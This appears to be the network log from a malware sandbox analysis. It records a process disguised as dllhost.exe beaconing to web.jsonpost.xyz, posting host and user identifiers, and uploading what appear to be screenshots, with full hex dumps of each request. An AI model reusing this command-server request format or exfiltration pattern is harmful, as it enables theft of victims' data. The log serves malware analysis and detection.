                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:52:20.048192024 CET6180OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.44975772.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:20.328190088 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.44975972.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:21.314338923 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:21.314412117 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:21.314488888 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:21.314515114 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:21.434545994 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:21.434587002 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:21.434691906 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:21.434691906 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:21.434771061 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:21.434823036 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:21.434892893 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.44976072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:21.756469011 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.44976172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:22.842962980 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:22.843040943 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:22.843097925 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:22.843209982 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:22.964282036 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:22.964304924 CET2472OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:22.964353085 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:22.964371920 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:22.964453936 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:22.964494944 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:22.964823008 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.44976272.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:23.233619928 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.44976372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:24.368957043 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:24.368984938 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:24.369057894 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:24.369090080 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:24.489129066 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:24.489182949 CET4944OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:24.489314079 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:24.489387989 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:24.489593029 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:24.609252930 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS
                                                                                Nov 29, 2024 01:52:24.609410048 CET4944OUTData Raw: 1d 09 af 3b db 62 7f e7 e3 ff 00 c0 bf e0 9e c7 d5 70 7f f3 e9 7f e0 3f f0 0f 2f d4 74 eb 8d 32 ed ad ae 17 0c bd 08 e8 c3 d4 55 4a ed bc 51 02 cd e1 9b 2d 4c 5d 4f 32 ce 63 68 c4 c9 18 2a ae a5 bf 84 75 e9 df 15 c4 d7 d1 e0 71 12 af 4a f3 5a a7
                                                                                Data Ascii: ;bp?/t2UJQ-L]O2ch*uqJZcs\$0iu((JZ(QE%QEQELQEQEQEJ(@)(QAQECEPIKI%-%;QEQIK@QEE0(%-(0J(J)))i(-%R)


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.44976472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:24.654834032 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.2.44976572.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:25.906521082 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:25.906553030 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:25.906605005 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:25.906630993 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:26.026796103 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
